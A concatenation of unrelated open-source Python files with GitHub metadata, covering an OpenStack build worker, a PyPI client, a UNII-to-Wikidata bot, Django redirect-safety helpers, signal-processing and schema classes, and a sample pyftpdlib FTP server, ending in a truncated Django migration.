del log_env['OPER_AUTH_TOKEN']
if 'OPER_OS_STORAGE_URL' in log_env:
del log_env['OPER_OS_STORAGE_URL']
solum.TLS.trace.support_info(environment=log_env)
logpath = "%s/%s-%s.log" % (user_env['SOLUM_TASK_DIR'],
'unittest',
user_env['BUILD_ID'])
LOG.debug("Unittest logs stored at %s" % logpath)
returncode = -1
assem = None
if assembly_id is not None:
assem = get_assembly_by_id(ctxt, assembly_id)
if assem.status == ASSEMBLY_STATES.DELETING:
return returncode
try:
runtest = subprocess.Popen(command, env=user_env,
stdout=subprocess.PIPE)
returncode = runtest.wait()
except OSError as subex:
LOG.exception("Exception running unit tests:")
LOG.exception(subex)
if assem is not None:
assem.type = 'app'
wf = objects.registry.Workflow.get_by_assembly_id(assem.id)
upload_task_log(ctxt, logpath, assem, wf.id, 'unittest')
if returncode == 0:
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.UNIT_TESTING_PASSED)
elif returncode > 0:
LOG.error("Unit tests failed. Return code is %r" % (returncode))
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.UNIT_TESTING_FAILED)
elif returncode < 0:
LOG.error("Error running unit tests.")
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.ERROR)
repo_utils.send_status(returncode, status_url, repo_token)
return returncode
def _get_private_key(self, source_creds, source_url):
source_private_key = ''
if source_creds:
cfg.CONF.import_opt('system_param_store',
'solum.api.handlers.plan_handler',
group='api')
store = cfg.CONF.api.system_param_store
if store == 'database':
deploy_keys_str = base64.b64decode(source_creds)
elif store == 'barbican':
client = clients.OpenStackClients(None).barbican().admin_client
secret = client.secrets.get(secret_ref=source_creds)
deploy_keys_str = secret.payload
elif store == 'local_file':
cfg.CONF.import_opt('system_param_file',
'solum.api.handlers.plan_handler',
group='api')
secrets_file = cfg.CONF.api.system_param_file
s = shelve.open(secrets_file)
deploy_keys_str = s[str(source_creds)]
deploy_keys_str = base64.b64decode(deploy_keys_str)
s.close()
deploy_keys = ast.literal_eval(deploy_keys_str)
for dk in deploy_keys:
if source_url == dk['source_url']:
source_private_key = dk['private_key']
return source_private_key
def build_lp(self, ctxt, image_id, git_info, name, source_format,
image_format, artifact_type, lp_params):
LOG.debug("Building languagepack %s" % name)
update_lp_status(ctxt, image_id, name, IMAGE_STATES.BUILDING)
solum.TLS.trace.clear()
solum.TLS.trace.import_context(ctxt)
source_uri = git_info['source_url']
build_cmd = self._get_build_command(ctxt, 'build', source_uri,
name, str(image_id),
source_format, 'docker', '',
artifact_type)
lp_access = get_lp_access_method(ctxt.project_id)
user_env = {}
try:
user_env = self._get_environment(ctxt,
git_info,
lp_access=lp_access)
except exception.SolumException as env_ex:
LOG.exception(_("Failed to successfully get environment for "
"building languagepack: `%s`"),
image_id)
LOG.exception(env_ex)
log_env = user_env.copy()
if 'OS_AUTH_TOKEN' in log_env:
del log_env['OS_AUTH_TOKEN']
if 'OPER_AUTH_TOKEN' in log_env:
del log_env['OPER_AUTH_TOKEN']
if 'OPER_OS_STORAGE_URL' in log_env:
del log_env['OPER_OS_STORAGE_URL']
solum.TLS.trace.support_info(environment=log_env)
logpath = "%s/%s-%s.log" % (user_env['SOLUM_TASK_DIR'],
'languagepack',
user_env['BUILD_ID'])
LOG.debug("Languagepack logs for LP %s stored at %s" %
(image_id, logpath))
out = None
status = IMAGE_STATES.ERROR
image_external_ref = None
docker_image_name = None
try:
try:
out = priv_rootwrap.execute(
*build_cmd, run_as_root=True, env_variables=user_env)[0]
except Exception as e:
LOG.exception("Failed to build languagepack: %s" % image_id)
LOG.exception(e)
out = ''
if isinstance(out, bytes):
out = out.decode('utf-8')
# we expect two lines in the output that look like:
# image_external_ref=<external storage ref>
# docker_image_name=<DU name>
for line in out.split('\n'):
# Don't break out early; the last matching
# line holds the expected value
if line.startswith('image_external_ref'):
solum.TLS.trace.support_info(build_lp_out_line=line)
image_external_ref = line.replace('image_external_ref=',
'').strip()
elif line.startswith('docker_image_name'):
docker_image_name = line.replace('docker_image_name=', '')
if image_external_ref and docker_image_name:
status = IMAGE_STATES.READY
else:
status = IMAGE_STATES.ERROR
except OSError as subex:
LOG.exception(_("Failed to successfully build languagepack: `%s`"),
image_id)
LOG.exception(subex)
img = get_image_by_id(ctxt, image_id)
img.type = 'languagepack'
update_lp_status(ctxt, image_id, name, status, image_external_ref,
docker_image_name)
upload_task_log(ctxt, logpath, img,
img.uuid, 'languagepack')
|
{
"content_hash": "0454d5dd34b5156ef3c7ea97cabf68ee",
"timestamp": "",
"source": "github",
"line_count": 756,
"max_line_length": 79,
"avg_line_length": 43.51058201058201,
"alnum_prop": 0.5329847388581505,
"repo_name": "openstack/solum",
"id": "096ca19c66e0e05d233811a6998cd529818f4088",
"size": "33505",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "solum/worker/handlers/shell.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1258"
},
{
"name": "Mako",
"bytes": "958"
},
{
"name": "Python",
"bytes": "1135443"
},
{
"name": "Shell",
"bytes": "73599"
}
],
"symlink_target": ""
}
|
import requests
from .exceptions import HTTPError
from .package import json2package
session = requests.Session()
def get(package_name, pypi_server="https://pypi.python.org/pypi/"):
    """
    Constructs a request to the PyPI server and returns an instance of
    :class:`yarg.package.Package`.

    :param package_name: case sensitive name of the package on the PyPI server.
    :param pypi_server: (optional) URL to the PyPI server.

        >>> import yarg
        >>> package = yarg.get('yarg')
        <Package yarg>
    """
    if not pypi_server.endswith("/"):
        pypi_server = pypi_server + "/"
    response = session.get("{0}{1}/json".format(pypi_server,
                                                package_name))
    if response.status_code >= 300:
        raise HTTPError(status_code=response.status_code,
                        reason=response.reason)
    if hasattr(response.content, 'decode'):
        return json2package(response.content.decode())
    else:
        return json2package(response.content)
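
# A short usage sketch (hedged: the mirror URL is illustrative). Any server
# exposing the PyPI JSON API ({server}/{package}/json) works, and any
# response with status >= 300 surfaces as yarg.exceptions.HTTPError:
#
#     >>> import yarg
#     >>> yarg.get('requests', pypi_server="https://pypi.example.org/pypi/")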
|
{
"content_hash": "dc37e87f64139aa3b436f59c90731f7d",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 79,
"avg_line_length": 32.21875,
"alnum_prop": 0.623666343355965,
"repo_name": "kura/yarg",
"id": "11375ce1125b6950220e0ca648acf2f72104678a",
"size": "2163",
"binary": false,
"copies": "1",
"ref": "refs/heads/imgbot",
"path": "yarg/client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "874"
},
{
"name": "Python",
"bytes": "45854"
}
],
"symlink_target": ""
}
|
"""
Bot code for creating chemical items in wikidata from UNII
Adapted from: https://github.com/sebotic/cdk_pywrapper/blob/master/cdk_pywrapper/chemlib.py
"""
import os
import re
import subprocess
import time
import zipfile
import pandas as pd
import wikidataintegrator.wdi_core as wdi_core
data_folder = "unii_data"
def load_unii():
    url = 'http://fdasis.nlm.nih.gov/srs/download/srs/UNII_Data.zip'
    if not os.path.exists(data_folder):
        os.makedirs(data_folder)
    subprocess.check_call(["wget", "-N", "-P", data_folder, url])
    with zipfile.ZipFile(os.path.join(data_folder, 'UNII_Data.zip'), 'r') as zf:
        zf.extractall(data_folder)
    for file in os.listdir(data_folder):
        if 'Records' in file:
            full_file_name = os.path.join(data_folder, file)
            os.rename(full_file_name, os.path.join(data_folder, 'unii_data.txt'))

class UNIIMolecule(object):
    unii_path = os.path.join(data_folder, 'unii_data.txt')
    if not os.path.exists(unii_path):
        load_unii()
    unii_df = pd.read_csv(unii_path, dtype=str, sep='\t', low_memory=False)

    def __init__(self, unii=None, inchi_key=None, verbose=False):
        if unii:
            ind = UNIIMolecule.unii_df['UNII'].values == unii
        else:
            ind = UNIIMolecule.unii_df['INCHIKEY'].values == inchi_key
        self.data = UNIIMolecule.unii_df.loc[ind, :]
        if len(self.data.index) != 1:
            raise ValueError('Provided ID did not return a unique UNII')
        self.data_index = self.data.index[0]
        if verbose:
            x = self.data
            print(x.common_name)
            print(x.stdinchikey)
            print(x.stdinchi)
            print(x.csid)

    @property
    def stdinchikey(self):
        ikey = self.data.loc[self.data_index, 'INCHIKEY']
        if pd.isnull(ikey) and pd.isnull(self.smiles):
            return None
        return ikey

    @property
    def stdinchi(self):
        if pd.isnull(self.smiles):
            return None

    @property
    def preferred_name(self):
        name = self.data.loc[self.data_index, 'PT']
        return UNIIMolecule.label_converter(name) if pd.notnull(name) else None

    @property
    def smiles(self):
        smiles = self.data.loc[self.data_index, 'SMILES']
        return smiles if pd.notnull(smiles) else None

    @property
    def molecule_type(self):
        molecule_type = self.data.loc[self.data_index, 'UNII_TYPE']
        return molecule_type if pd.notnull(molecule_type) else None

    @property
    def unii(self):
        return self.data.loc[self.data_index, 'UNII']

    @property
    def cas(self):
        cas = self.data.loc[self.data_index, 'RN']
        return cas if pd.notnull(cas) else None

    @property
    def einecs(self):
        einecs = self.data.loc[self.data_index, 'EC']
        return einecs if pd.notnull(einecs) else None

    @property
    def rxnorm(self):
        rxnorm = self.data.loc[self.data_index, 'RXCUI']
        return rxnorm if pd.notnull(rxnorm) else None

    @property
    def nci(self):
        nci = self.data.loc[self.data_index, 'NCIT']
        return nci if pd.notnull(nci) else None

    @property
    def umls(self):
        umls_cui = self.data.loc[self.data_index, 'UMLS_CUI']
        return umls_cui if pd.notnull(umls_cui) else None

    @property
    def pubchem(self):
        pubchem = self.data.loc[self.data_index, 'PUBCHEM']
        return pubchem if pd.notnull(pubchem) else None

    @property
    def label(self):
        item_label = self.preferred_name if self.preferred_name else self.unii
        return item_label

    def to_wikidata(self):
        refs = [[
            wdi_core.WDItemID(value='Q6593799', prop_nr='P248', is_reference=True),  # stated in
            wdi_core.WDExternalID(value=self.unii, prop_nr='P652', is_reference=True),  # source element
            wdi_core.WDTime(time=time.strftime('+%Y-%m-%dT00:00:00Z'), prop_nr='P813', is_reference=True)  # retrieved
        ]]
        print('UNII Main label is', self.label)
        elements = {
            'P652': self.unii,
            'P2017': self.smiles,
            'P235': self.stdinchikey,
            'P231': self.cas,
            'P232': self.einecs,
            'P1748': self.nci,
            'P3345': self.rxnorm
        }
        if self.smiles and len(self.smiles) > 400:
            del elements['P2017']
        data = []
        for k, v in elements.items():
            if not v:
                continue
            print('{}:'.format(k), v)
            if isinstance(v, list) or isinstance(v, set):
                for x in v:
                    data.append(wdi_core.WDString(prop_nr=k, value=x, references=refs))
            else:
                data.append(wdi_core.WDString(prop_nr=k, value=v, references=refs))
        return data

    @staticmethod
    def label_converter(label):
        label = label.lower()
        greek_codes = {
            '.alpha.': '\u03B1',
            '.beta.': '\u03B2',
            '.gamma.': '\u03B3',
            '.delta.': '\u03B4',
            '.epsilon.': '\u03B5',
            '.zeta.': '\u03B6',
            '.eta.': '\u03B7',
            '.theta.': '\u03B8',
            '.iota.': '\u03B9',
            '.kappa.': '\u03BA',
            '.lambda.': '\u03BB',
            '.mu.': '\u03BC',
            '.nu.': '\u03BD',
            '.xi.': '\u03BE',
            '.omicron.': '\u03BF',
            '.pi.': '\u03C0',
            '.rho.': '\u03C1',
            '.sigma.': '\u03C3',
            '.tau.': '\u03C4',
            '.upsilon.': '\u03C5',
            '.phi.': '\u03C6',
            '.chi.': '\u03C7',
            '.psi.': '\u03C8',
            '.omega.': '\u03C9',
        }
        for greek_letter, unicode in greek_codes.items():
            if greek_letter in label:
                label = label.replace(greek_letter, unicode)
        match = re.compile('(^|[^a-z])([ezdlnhros]{1}|dl{1})[^a-z]{1}')
        while True:
            if re.search(match, label):
                replacement = label[re.search(match, label).start(): re.search(match, label).end()].upper()
                label = re.sub(match, repl=replacement, string=label, count=1)
            else:
                break
        splits = label.split(', ')
        splits.reverse()
        return ''.join(splits)
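
# A worked example of label_converter (hedged: an illustrative input, not
# checked against the UNII data): '.ALPHA.-TOCOPHEROL, DL-' is lowercased,
# '.alpha.' becomes 'α', the regex re-uppercases the stereo prefix 'dl-',
# and the comma-separated parts are reversed, yielding 'DL-α-tocopherol'.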
|
{
"content_hash": "2f6ebc5c42160480de20f9757f032eb5",
"timestamp": "",
"source": "github",
"line_count": 211,
"max_line_length": 118,
"avg_line_length": 30.023696682464454,
"alnum_prop": 0.5486977111286504,
"repo_name": "SuLab/scheduled-bots",
"id": "16fdee39cd883f89161a868d7235ae222ccc5b86",
"size": "6335",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "scheduled_bots/drugs/unii.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1296"
},
{
"name": "Jupyter Notebook",
"bytes": "1049300"
},
{
"name": "Python",
"bytes": "709603"
},
{
"name": "Shell",
"bytes": "5313"
}
],
"symlink_target": ""
}
|
import urlparse
import functools
from django.utils.decorators import method_decorator
from django.core.exceptions import SuspiciousOperation
def class_view_decorator(function_decorator):
    """
    Convert a function based decorator into a class based decorator usable
    on class based Views.

    Follows the general idea from `https://docs.djangoproject.com/en/dev/topics/
    class-based-views/#decorating-the-class`.

    Can't subclass the `View` as it breaks inheritance (super in particular),
    so we monkey-patch instead.
    """
    def simple_decorator(View):
        View.dispatch = method_decorator(function_decorator)(View.dispatch)
        return View
    return simple_decorator

def default_redirect(request, fallback_url, **kwargs):
    redirect_field_name = kwargs.get("redirect_field_name", "next")
    next = request.REQUEST.get(redirect_field_name)
    if not next:
        # try the session if available
        if hasattr(request, "session"):
            session_key_value = kwargs.get("session_key_value", "redirect_to")
            next = request.session.get(session_key_value)
    is_safe = functools.partial(
        ensure_safe_url,
        allowed_protocols=kwargs.get("allowed_protocols"),
        allowed_host=request.get_host()
    )
    redirect_to = next if next and is_safe(next) else fallback_url
    # perform one last check to ensure the URL is safe to redirect to. if it
    # is not then we should bail here as it is likely developer error and
    # they should be notified
    is_safe(redirect_to, raise_on_fail=True)
    return redirect_to

def ensure_safe_url(url, allowed_protocols=None, allowed_host=None, raise_on_fail=False):
    if allowed_protocols is None:
        allowed_protocols = ["http", "https"]
    parsed = urlparse.urlparse(url)
    # perform security checks to ensure no malicious intent
    # (i.e., an XSS attack with a data URL)
    safe = True
    if parsed.scheme and parsed.scheme not in allowed_protocols:
        if raise_on_fail:
            raise SuspiciousOperation("Unsafe redirect to URL with protocol '%s'" % parsed.scheme)
        safe = False
    if allowed_host and parsed.netloc and parsed.netloc != allowed_host:
        if raise_on_fail:
            raise SuspiciousOperation("Unsafe redirect to URL not matching host '%s'" % allowed_host)
        safe = False
    return safe
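
# A usage sketch (hedged: the view and URLs are hypothetical):
#
#     def logout_view(request):
#         url = default_redirect(request, fallback_url="/",
#                                redirect_field_name="next")
#         return HttpResponseRedirect(url)
#
# ensure_safe_url("javascript:alert(1)") returns False because the scheme is
# outside the default ["http", "https"] allow-list; called with
# raise_on_fail=True it raises SuspiciousOperation instead.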
|
{
"content_hash": "7f7c742391c94235535d576818587169",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 101,
"avg_line_length": 38.20967741935484,
"alnum_prop": 0.6893203883495146,
"repo_name": "indexofire/gork",
"id": "f821959b8180b7c2f5f25dae92107ce3b4600a3b",
"size": "2393",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/gork/contrib/gbase/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "199039"
},
{
"name": "JavaScript",
"bytes": "89817"
},
{
"name": "Python",
"bytes": "1120919"
},
{
"name": "Shell",
"bytes": "6713"
}
],
"symlink_target": ""
}
|
"""
Copyright 2013 OpERA
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from gnuradio import digital #pylint: disable=F0401
from device import UHDGenericArch #pylint: disable=F0401
from utils import Logger #pylint: disable=F0401
#::TODO:: description of the class and its methods
class SNREstimator(UHDGenericArch):
    """
    """
    SIMPLE = 0
    SKEW = 1
    MOMENT = 2
    SVR = 3

    def __init__(self,
                 name="SNREstimator",
                 algorithm=SVR,
                 alpha=0.001):
        """
        CTOR

        @param name
        @param algorithm
        @param alpha
        """
        self._estimator = digital.probe_mpsk_snr_est_c(algorithm, 10000, alpha)
        UHDGenericArch.__init__(self,
                                name=name,
                                input_signature=self._estimator.input_signature(),
                                output_signature=self._estimator.output_signature())
        Logger.register(name, ['snr', ])
        self.register_scheduling(lambda: Logger.append(name, 'snr', self.get_snr()), delay_sec=0.2)  #pylint: disable=E1101

    #::TODO:: why do the input and output signature parameters exist if they are not being used?
    def _build(self, input_signature, output_signature):
        """
        @param input_signature
        @param output_signature
        """
        return self._estimator

    def get_snr(self):
        """
        """
        return self._estimator.snr()
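
# A usage sketch (hedged: flowgraph wiring is omitted, and this assumes the
# integer constants map onto gr-digital's MPSK SNR estimator types, as the
# constructor intends):
#
#     snr_block = SNREstimator(name="snr_probe",
#                              algorithm=SNREstimator.SKEW,
#                              alpha=0.001)
#     # ...connect snr_block into the flowgraph, start it, then poll:
#     current_snr = snr_block.get_snr()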
|
{
"content_hash": "bec10ae2f5655aa8011ee6809266ec28",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 123,
"avg_line_length": 29.220588235294116,
"alnum_prop": 0.6109713135379969,
"repo_name": "ComputerNetworks-UFRGS/OpERA",
"id": "10beb830bed912d9e4b74e2e37be8d7a969c622a",
"size": "1987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/gr_blocks/utils/snrEstimator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AMPL",
"bytes": "1555"
},
{
"name": "C",
"bytes": "1049"
},
{
"name": "C++",
"bytes": "6177"
},
{
"name": "CMake",
"bytes": "59994"
},
{
"name": "Python",
"bytes": "1125235"
},
{
"name": "Shell",
"bytes": "5532"
}
],
"symlink_target": ""
}
|
"""Program to convert power logging config from a servo_ina device
to a sweetberry config.
"""
# Note: This is a py2/3 compatible file.
from __future__ import print_function
import os
import sys
def fetch_records(basename):
    """Import records from a servo_ina file.

    servo_ina files are python imports, and have a list of tuples with
    the INA data:
    (inatype, i2caddr, rail name, bus voltage, shunt ohms, mux, True)

    Args:
        basename: python import name (filename without the .py extension)

    Returns:
        list of tuples as described above.
    """
    ina_desc = __import__(basename)
    return ina_desc.inas

def main(argv):
    if len(argv) != 2:
        print("usage:")
        print("  %s input.py" % argv[0])
        return
    inputf = argv[1]
    basename = os.path.splitext(inputf)[0]
    outputf = basename + ".board"
    outputs = basename + ".scenario"
    print("Converting %s to %s, %s" % (inputf, outputf, outputs))
    inas = fetch_records(basename)
    boardfile = open(outputf, "w")
    scenario = open(outputs, "w")
    boardfile.write("[\n")
    scenario.write("[\n")
    start = True
    for rec in inas:
        if start:
            start = False
        else:
            boardfile.write(",\n")
            scenario.write(",\n")
        record = (
            ' {"name": "%s", "rs": %f, "sweetberry": "A", "channel": %d}'
            % (
                rec[2],
                rec[4],
                rec[1] - 64,
            )
        )
        boardfile.write(record)
        scenario.write('"%s"' % rec[2])
    boardfile.write("\n")
    boardfile.write("]")
    scenario.write("\n")
    scenario.write("]")

if __name__ == "__main__":
    main(sys.argv)
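
# A worked sketch of the conversion (hedged: the rail name and values are
# made up): a servo_ina record
#     ('ina219', 0x41, 'pp3300_wlan', 3.3, 0.010, None, True)
# becomes the .board entry
#     {"name": "pp3300_wlan", "rs": 0.010000, "sweetberry": "A", "channel": 1}
# because channel = i2caddr - 64 (0x41 - 0x40 = 1), and "pp3300_wlan" is
# appended to the .scenario list.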
|
{
"content_hash": "3c7eda8ca46f0566b96df545a8916c92",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 74,
"avg_line_length": 21.846153846153847,
"alnum_prop": 0.5434272300469484,
"repo_name": "coreboot/chrome-ec",
"id": "1deb75cda441e9673ee77be9066e74eb8dafdb33",
"size": "1869",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "extra/usb_power/convert_servo_ina.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "153372"
},
{
"name": "C",
"bytes": "25514204"
},
{
"name": "C++",
"bytes": "617015"
},
{
"name": "CMake",
"bytes": "114317"
},
{
"name": "Emacs Lisp",
"bytes": "136"
},
{
"name": "Go",
"bytes": "40545"
},
{
"name": "HTML",
"bytes": "602017"
},
{
"name": "Makefile",
"bytes": "247601"
},
{
"name": "Pawn",
"bytes": "3004"
},
{
"name": "Python",
"bytes": "1006209"
},
{
"name": "Shell",
"bytes": "138354"
},
{
"name": "SourcePawn",
"bytes": "3051"
},
{
"name": "Tcl",
"bytes": "5238"
}
],
"symlink_target": ""
}
|
import six
from rip.schema.base_field import BaseField, FieldTypes
from rip.schema.sub_resource_field import SubResourceField
class ApiSchemaOptions(object):
    def __init__(self, meta_options, fields, declared_fields):
        if meta_options:
            for override_name in dir(meta_options):
                override = getattr(meta_options, override_name)
                setattr(self, override_name, override)
        self.fields = fields
        self.declared_fields = declared_fields

class ApiSchemaMetaClass(type):
    def __new__(cls, name, bases, attrs):
        fields = {}
        declared_fields = {}
        # Inherit any fields from parent(s).
        try:
            parents = [b for b in bases if issubclass(b, ApiSchema)]
            # Simulate the MRO.
            parents.reverse()
            for p in parents:
                meta_on_parent = getattr(p, '_meta', None)
                fields_declared_on_parent = meta_on_parent.fields if meta_on_parent else {}
                for field_name, field in fields_declared_on_parent.items():
                    fields[field_name] = field
        except NameError:
            pass
        for field_name, field in attrs.copy().items():
            # Runs only once during class construction.
            # Copy should not be a performance hit.
            if isinstance(field, BaseField):
                field = attrs.pop(field_name)
                declared_fields[field_name] = field
        fields.update(declared_fields)
        new_class = super(ApiSchemaMetaClass, cls).__new__(cls, name, bases,
                                                           attrs)
        for field_name, field in fields.items():
            field.schema_cls = new_class
        meta = getattr(new_class, 'Meta', None)
        new_class._meta = ApiSchemaOptions(meta, fields, declared_fields)
        return new_class

class ApiSchema(six.with_metaclass(ApiSchemaMetaClass)):
    def __new__(cls, *args, **kwargs):
        if not hasattr(cls._meta, 'schema_name'):
            raise TypeError(
                'Missing meta property `schema_name` on Schema `{schema_cls}`'
                .format(schema_cls=cls.__name__))
        obj = super(ApiSchema, cls).__new__(cls, *args, **kwargs)
        return obj

    def __init__(self, **kwargs):
        for key, value in kwargs.items():
            setattr(self, key, value)

    def __eq__(self, value):
        for field_name, field_object in self._meta.fields.items():
            if getattr(self, field_name) != getattr(value, field_name):
                return False
        return True

    @classmethod
    def non_readonly_fields(cls):
        return {field_name: field for field_name, field in
                cls._meta.fields.items()
                if field.field_type != FieldTypes.READONLY}

    @classmethod
    def updatable_fields(cls):
        return {field_name: field for field_name, field in
                cls._meta.fields.items()
                if field.field_type == FieldTypes.DEFAULT}

    @classmethod
    def sub_resource_fields(cls):
        return {field_name: field for field_name, field in
                cls._meta.fields.items()
                if isinstance(field, SubResourceField)}

    @classmethod
    def list_fields(cls):
        return {field_name: field for field_name, field in
                cls._meta.fields.items()
                if field.show_in_list}
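
# A minimal usage sketch (hedged: `SomeStringField` is a hypothetical
# BaseField subclass; any BaseField instance on the class body is collected
# into _meta.fields by the metaclass):
#
#     class PersonSchema(ApiSchema):
#         name = SomeStringField()
#
#         class Meta:
#             schema_name = 'persons'  # required; __new__ raises TypeError without it
#
# Subclasses of PersonSchema inherit `name`, because the metaclass merges
# each parent's _meta.fields before adding the newly declared fields.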
|
{
"content_hash": "87e5087671cdd84be981d3b8745dad46",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 91,
"avg_line_length": 34.27,
"alnum_prop": 0.5736796031514444,
"repo_name": "Aplopio/django_rip",
"id": "9c357c665a37ee02d3b719ee5680f9540886d1ba",
"size": "3427",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "rip/api_schema.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1455"
},
{
"name": "Python",
"bytes": "446585"
}
],
"symlink_target": ""
}
|
from django.apps import AppConfig
class DuckConfig(AppConfig):
    name = 'duck'
|
{
"content_hash": "82841082ee7cd528b5f86fd716b6f7d9",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 33,
"avg_line_length": 16.6,
"alnum_prop": 0.7349397590361446,
"repo_name": "lastcoolnameleft/duckiehunt",
"id": "dac60ff2216143273eb6354f40878126cafcdca6",
"size": "83",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/duck/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3346"
},
{
"name": "Dockerfile",
"bytes": "416"
},
{
"name": "HTML",
"bytes": "138998"
},
{
"name": "Mustache",
"bytes": "516"
},
{
"name": "Python",
"bytes": "27016"
},
{
"name": "Shell",
"bytes": "432"
}
],
"symlink_target": ""
}
|
import opengm
import numpy
#---------------------------------------------------------------
# MinSum with SelfFusion
#---------------------------------------------------------------
numpy.random.seed(42)
gm=opengm.loadGm("/home/tbeier/models/mrf-inpainting/house-gm.h5","gm")
#---------------------------------------------------------------
# Minimize
#---------------------------------------------------------------
#get an instance of the optimizer / inference-algorithm
inf = opengm.inference.CheapInitialization(gm)
inf.infer()
arg = inf.arg()
print gm.evaluate(arg)
infParam = opengm.InfParam(
numIt=2000,
generator='upDown'
)
inf=opengm.inference.FusionBased(gm, parameter=infParam)
inf.setStartingPoint(arg)
# start inference (in this case verbose inference)
visitor=inf.verboseVisitor(printNth=1,multiline=True)
inf.infer(visitor)
arg = inf.arg()
|
{
"content_hash": "135973a0d0eec9bb1d83af15cedc29be",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 71,
"avg_line_length": 25.647058823529413,
"alnum_prop": 0.5344036697247706,
"repo_name": "recarroll/opengm",
"id": "a264d6bc574ffc48a962d89b5b4714e3293d2695",
"size": "872",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/interfaces/python/examples/inference_fusion_based.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "297"
},
{
"name": "C++",
"bytes": "5076662"
},
{
"name": "CMake",
"bytes": "127021"
},
{
"name": "Matlab",
"bytes": "31703"
},
{
"name": "Python",
"bytes": "229370"
},
{
"name": "Shell",
"bytes": "150"
}
],
"symlink_target": ""
}
|
"""A basic FTP server which uses a DummyAuthorizer for managing 'virtual
users', setting a limit for incoming connections.
"""
import os
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
def main():
# Instantiate a dummy authorizer for managing 'virtual' users
authorizer = DummyAuthorizer()
# Define a new user having full r/w permissions and a read-only
# anonymous user
authorizer.add_user('user', '12345', os.getcwd(), perm='elradfmwM')
authorizer.add_anonymous(os.getcwd())
# Instantiate FTP handler class
handler = FTPHandler
handler.authorizer = authorizer
# Define a customized banner (string returned when client connects)
handler.banner = "pyftpdlib based ftpd ready."
# Specify a masquerade address and the range of ports to use for
    # passive connections. Uncomment these in case you're behind a NAT.
# handler.masquerade_address = '151.25.42.11'
# handler.passive_ports = range(60000, 65535)
    # Instantiate FTP server class and listen on 0.0.0.0:6666
address = ('', 6666)
server = FTPServer(address, handler)
# set a limit for connections
server.max_cons = 256
server.max_cons_per_ip = 5
# start ftp server
server.serve_forever()
if __name__ == '__main__':
main()
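
# A quick way to exercise this server from another shell, using only the
# standard library (assumes the server above is running locally on port 6666):
#
#     from ftplib import FTP
#     ftp = FTP()
#     ftp.connect('localhost', 6666)
#     ftp.login('user', '12345')
#     ftp.retrlines('LIST')
#     ftp.quit()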
|
{
"content_hash": "679f7228ef04bff735bbeec6a13039a8",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 72,
"avg_line_length": 29.58695652173913,
"alnum_prop": 0.7046289493019838,
"repo_name": "kugg/micromaker",
"id": "bb2a387a8fb8e750d5ac5371c59f3648bc75078b",
"size": "1540",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "attacker/basic_ftpd.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4560"
},
{
"name": "Shell",
"bytes": "509"
}
],
"symlink_target": ""
}
|
import ConfigParser
class Tenant():
def __init__(self):
self.config = ConfigParser.ConfigParser()
def load_properties(self, project_name=None):
self.config.read('igor.ini')
    def get_property(self, name, default=None):
        try:
            value = self.config.get('igor', name)
        except ConfigParser.NoOptionError:
            return default
        if value is None:
            return default
        return value
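
# Example usage, assuming an igor.ini file with an [igor] section is present
# in the working directory:
#
#     tenant = Tenant()
#     tenant.load_properties()
#     db_host = tenant.get_property('db_host', default='localhost')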
|
{
"content_hash": "dc4dd0b70c4de6ef8b60df907f8aa112",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 49,
"avg_line_length": 27.11111111111111,
"alnum_prop": 0.5942622950819673,
"repo_name": "wdsx/igor",
"id": "b1365653c714c50f3dcbe2f1c350600e7adfa795",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wds/landlord/landlord.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2030"
},
{
"name": "HTML",
"bytes": "1813"
},
{
"name": "Python",
"bytes": "81677"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('movielists', '0006_auto_20150412_1316'),
]
operations = [
migrations.AlterField(
model_name='movie',
name='image',
field=models.ImageField(upload_to=b'../../media', blank=True),
preserve_default=True,
),
]
|
{
"content_hash": "650ed45d79c119609c8e75fbef97220d",
"timestamp": "",
"source": "github",
"line_count": 19,
